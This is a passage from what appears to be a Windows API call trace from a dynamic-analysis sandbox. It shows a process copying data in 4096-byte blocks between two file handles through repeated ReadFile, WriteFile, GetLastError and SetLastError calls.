lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.730] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.731] GetLastError () returned 0x0 [0093.731] SetLastError (dwErrCode=0x0) [0093.731] GetLastError () returned 0x0 [0093.731] SetLastError (dwErrCode=0x0) [0093.731] GetLastError () returned 0x0 [0093.731] SetLastError (dwErrCode=0x0) [0093.731] GetLastError () returned 0x0 [0093.731] SetLastError (dwErrCode=0x0) [0093.731] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.731] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.731] GetLastError () returned 0x0 [0093.731] SetLastError (dwErrCode=0x0) [0093.731] GetLastError () returned 0x0 [0093.731] SetLastError (dwErrCode=0x0) [0093.731] GetLastError () returned 0x0 [0093.731] SetLastError (dwErrCode=0x0) [0093.731] GetLastError () returned 0x0 [0093.731] SetLastError (dwErrCode=0x0) [0093.732] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.732] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.732] GetLastError () returned 0x0 [0093.732] SetLastError (dwErrCode=0x0) [0093.732] GetLastError () returned 0x0 [0093.732] SetLastError (dwErrCode=0x0) [0093.732] GetLastError () returned 0x0 [0093.732] SetLastError (dwErrCode=0x0) [0093.732] GetLastError () returned 0x0 [0093.732] SetLastError (dwErrCode=0x0) [0093.732] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.732] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.732] GetLastError () returned 0x0 [0093.732] SetLastError (dwErrCode=0x0) [0093.732] GetLastError () returned 0x0 [0093.732] SetLastError (dwErrCode=0x0) [0093.732] GetLastError () returned 0x0 [0093.733] SetLastError (dwErrCode=0x0) [0093.733] GetLastError () returned 0x0 [0093.733] SetLastError (dwErrCode=0x0) [0093.733] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.733] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.733] GetLastError () returned 0x0 [0093.733] SetLastError (dwErrCode=0x0) [0093.733] GetLastError () returned 0x0 [0093.733] SetLastError (dwErrCode=0x0) [0093.733] GetLastError () returned 0x0 [0093.733] SetLastError (dwErrCode=0x0) [0093.733] GetLastError () returned 0x0 [0093.733] SetLastError (dwErrCode=0x0) [0093.733] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.733] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.733] GetLastError () returned 0x0 [0093.733] SetLastError (dwErrCode=0x0) [0093.733] GetLastError () returned 0x0 [0093.733] SetLastError (dwErrCode=0x0) [0093.734] GetLastError () returned 0x0 [0093.734] SetLastError (dwErrCode=0x0) [0093.734] GetLastError () returned 0x0 [0093.734] SetLastError (dwErrCode=0x0) [0093.734] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.734] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.734] GetLastError () returned 0x0 [0093.734] SetLastError (dwErrCode=0x0) [0093.734] GetLastError () returned 0x0 [0093.734] SetLastError (dwErrCode=0x0) [0093.734] GetLastError () returned 0x0 [0093.734] SetLastError (dwErrCode=0x0) [0093.734] GetLastError () returned 0x0 [0093.734] SetLastError (dwErrCode=0x0) [0093.734] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.734] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.734] GetLastError () returned 0x0 [0093.734] SetLastError (dwErrCode=0x0) [0093.734] GetLastError () returned 0x0 [0093.735] SetLastError (dwErrCode=0x0) [0093.735] GetLastError () returned 0x0 [0093.735] SetLastError (dwErrCode=0x0) [0093.735] GetLastError () returned 0x0 [0093.735] SetLastError (dwErrCode=0x0) [0093.735] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.735] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.735] GetLastError () returned 0x0 [0093.735] SetLastError (dwErrCode=0x0) [0093.735] GetLastError () returned 0x0 [0093.735] SetLastError (dwErrCode=0x0) [0093.735] GetLastError () returned 0x0 [0093.735] SetLastError (dwErrCode=0x0) [0093.735] GetLastError () returned 0x0 [0093.735] SetLastError (dwErrCode=0x0) [0093.735] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.735] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.735] GetLastError () returned 0x0 [0093.735] SetLastError (dwErrCode=0x0) [0093.735] GetLastError () returned 0x0 [0093.736] SetLastError (dwErrCode=0x0) [0093.736] GetLastError () returned 0x0 [0093.736] SetLastError (dwErrCode=0x0) [0093.736] GetLastError () returned 0x0 [0093.736] SetLastError (dwErrCode=0x0) [0093.736] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.736] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.736] GetLastError () returned 0x0 [0093.736] SetLastError (dwErrCode=0x0) [0093.736] GetLastError () returned 0x0 [0093.736] SetLastError (dwErrCode=0x0) [0093.736] GetLastError () returned 0x0 [0093.736] SetLastError (dwErrCode=0x0) [0093.736] GetLastError () returned 0x0 [0093.736] SetLastError (dwErrCode=0x0) [0093.736] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.736] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.736] GetLastError () returned 0x0 [0093.736] SetLastError (dwErrCode=0x0) [0093.737] GetLastError () returned 0x0 [0093.737] SetLastError (dwErrCode=0x0) [0093.737] GetLastError () returned 0x0 [0093.737] SetLastError (dwErrCode=0x0) [0093.737] GetLastError () returned 0x0 [0093.737] SetLastError (dwErrCode=0x0) [0093.737] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.737] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.737] GetLastError () returned 0x0 [0093.737] SetLastError (dwErrCode=0x0) [0093.737] GetLastError () returned 0x0 [0093.737] SetLastError (dwErrCode=0x0) [0093.737] GetLastError () returned 0x0 [0093.737] SetLastError (dwErrCode=0x0) [0093.737] GetLastError () returned 0x0 [0093.737] SetLastError (dwErrCode=0x0) [0093.737] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.737] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.738] GetLastError () returned 0x0 [0093.738] SetLastError (dwErrCode=0x0) [0093.738] GetLastError () returned 0x0 [0093.738] SetLastError (dwErrCode=0x0) [0093.738] GetLastError () returned 0x0 [0093.738] SetLastError (dwErrCode=0x0) [0093.738] GetLastError () returned 0x0 [0093.738] SetLastError (dwErrCode=0x0) [0093.738] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.738] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.738] GetLastError () returned 0x0 [0093.738] SetLastError (dwErrCode=0x0) [0093.738] GetLastError () returned 0x0 [0093.738] SetLastError (dwErrCode=0x0) [0093.738] GetLastError () returned 0x0 [0093.738] SetLastError (dwErrCode=0x0) [0093.738] GetLastError () returned 0x0 [0093.738] SetLastError (dwErrCode=0x0) [0093.738] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.738] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.739] GetLastError () returned 0x0 [0093.739] SetLastError (dwErrCode=0x0) [0093.739] GetLastError () returned 0x0 [0093.739] SetLastError (dwErrCode=0x0) [0093.739] GetLastError () returned 0x0 [0093.739] SetLastError (dwErrCode=0x0) [0093.739] GetLastError () returned 0x0 [0093.739] SetLastError (dwErrCode=0x0) [0093.739] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.739] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.739] GetLastError () returned 0x0 [0093.739] SetLastError (dwErrCode=0x0) [0093.739] GetLastError () returned 0x0 [0093.739] SetLastError (dwErrCode=0x0) [0093.739] GetLastError () returned 0x0 [0093.739] SetLastError (dwErrCode=0x0) [0093.739] GetLastError () returned 0x0 [0093.739] SetLastError (dwErrCode=0x0) [0093.739] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.739] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.740] GetLastError () returned 0x0 [0093.740] SetLastError (dwErrCode=0x0) [0093.740] GetLastError () returned 0x0 [0093.740] SetLastError (dwErrCode=0x0) [0093.740] GetLastError () returned 0x0 [0093.740] SetLastError (dwErrCode=0x0) [0093.740] GetLastError () returned 0x0 [0093.740] SetLastError (dwErrCode=0x0) [0093.740] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.740] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.740] GetLastError () returned 0x0 [0093.740] SetLastError (dwErrCode=0x0) [0093.740] GetLastError () returned 0x0 [0093.740] SetLastError (dwErrCode=0x0) [0093.740] GetLastError () returned 0x0 [0093.740] SetLastError (dwErrCode=0x0) [0093.740] GetLastError () returned 0x0 [0093.740] SetLastError (dwErrCode=0x0) [0093.740] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.741] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.741] GetLastError () returned 0x0 [0093.741] SetLastError (dwErrCode=0x0) [0093.741] GetLastError () returned 0x0 [0093.741] SetLastError (dwErrCode=0x0) [0093.741] GetLastError () returned 0x0 [0093.742] SetLastError (dwErrCode=0x0) [0093.742] GetLastError () returned 0x0 [0093.742] SetLastError (dwErrCode=0x0) [0093.742] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.742] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.742] GetLastError () returned 0x0 [0093.742] SetLastError (dwErrCode=0x0) [0093.742] GetLastError () returned 0x0 [0093.742] SetLastError (dwErrCode=0x0) [0093.742] GetLastError () returned 0x0 [0093.742] SetLastError (dwErrCode=0x0) [0093.742] GetLastError () returned 0x0 [0093.742] SetLastError (dwErrCode=0x0) [0093.742] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.742] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.742] GetLastError () returned 0x0 [0093.742] SetLastError (dwErrCode=0x0) [0093.743] GetLastError () returned 0x0 [0093.743] SetLastError (dwErrCode=0x0) [0093.743] GetLastError () returned 0x0 [0093.743] SetLastError (dwErrCode=0x0) [0093.743] GetLastError () returned 0x0 [0093.743] SetLastError (dwErrCode=0x0) [0093.743] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.743] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.743] GetLastError () returned 0x0 [0093.743] SetLastError (dwErrCode=0x0) [0093.743] GetLastError () returned 0x0 [0093.743] SetLastError (dwErrCode=0x0) [0093.743] GetLastError () returned 0x0 [0093.743] SetLastError (dwErrCode=0x0) [0093.743] GetLastError () returned 0x0 [0093.743] SetLastError (dwErrCode=0x0) [0093.867] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.871] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.885] GetLastError () returned 0x0 [0093.885] SetLastError (dwErrCode=0x0) [0093.885] GetLastError () returned 0x0 [0093.885] SetLastError (dwErrCode=0x0) [0093.885] GetLastError () returned 0x0 [0093.885] SetLastError (dwErrCode=0x0) [0093.885] GetLastError () returned 0x0 [0093.885] SetLastError (dwErrCode=0x0) [0093.885] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.885] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.885] GetLastError () returned 0x0 [0093.885] SetLastError (dwErrCode=0x0) [0093.885] GetLastError () returned 0x0 [0093.885] SetLastError (dwErrCode=0x0) [0093.885] GetLastError () returned 0x0 [0093.885] SetLastError (dwErrCode=0x0) [0093.885] GetLastError () returned 0x0 [0093.885] SetLastError (dwErrCode=0x0) [0093.885] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.886] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.886] GetLastError () returned 0x0 [0093.886] SetLastError (dwErrCode=0x0) [0093.886] GetLastError () returned 0x0 [0093.886] SetLastError (dwErrCode=0x0) [0093.886] GetLastError () returned 0x0 [0093.886] SetLastError (dwErrCode=0x0) [0093.886] GetLastError () returned 0x0 [0093.886] SetLastError (dwErrCode=0x0) [0093.886] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.886] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.886] GetLastError () returned 0x0 [0093.886] SetLastError (dwErrCode=0x0) [0093.886] GetLastError () returned 0x0 [0093.886] SetLastError (dwErrCode=0x0) [0093.886] GetLastError () returned 0x0 [0093.886] SetLastError (dwErrCode=0x0) [0093.887] GetLastError () returned 0x0 [0093.887] SetLastError (dwErrCode=0x0) [0093.887] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.887] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.887] GetLastError () returned 0x0 [0093.887] SetLastError (dwErrCode=0x0) [0093.887] GetLastError () returned 0x0 [0093.887] SetLastError (dwErrCode=0x0) [0093.887] GetLastError () returned 0x0 [0093.887] SetLastError (dwErrCode=0x0) [0093.887] GetLastError () returned 0x0 [0093.887] SetLastError (dwErrCode=0x0) [0093.887] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.887] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.887] GetLastError () returned 0x0 [0093.887] SetLastError (dwErrCode=0x0) [0093.887] GetLastError () returned 0x0 [0093.888] SetLastError (dwErrCode=0x0) [0093.888] GetLastError () returned 0x0 [0093.888] SetLastError (dwErrCode=0x0) [0093.888] GetLastError () returned 0x0 [0093.888] SetLastError (dwErrCode=0x0) [0093.888] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.888] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.888] GetLastError () returned 0x0 [0093.888] SetLastError (dwErrCode=0x0) [0093.888] GetLastError () returned 0x0 [0093.888] SetLastError (dwErrCode=0x0) [0093.888] GetLastError () returned 0x0 [0093.888] SetLastError (dwErrCode=0x0) [0093.888] GetLastError () returned 0x0 [0093.888] SetLastError (dwErrCode=0x0) [0093.888] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.888] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.888] GetLastError () returned 0x0 [0093.889] SetLastError (dwErrCode=0x0) [0093.889] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.889] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.889] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.889] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.891] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.891] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, 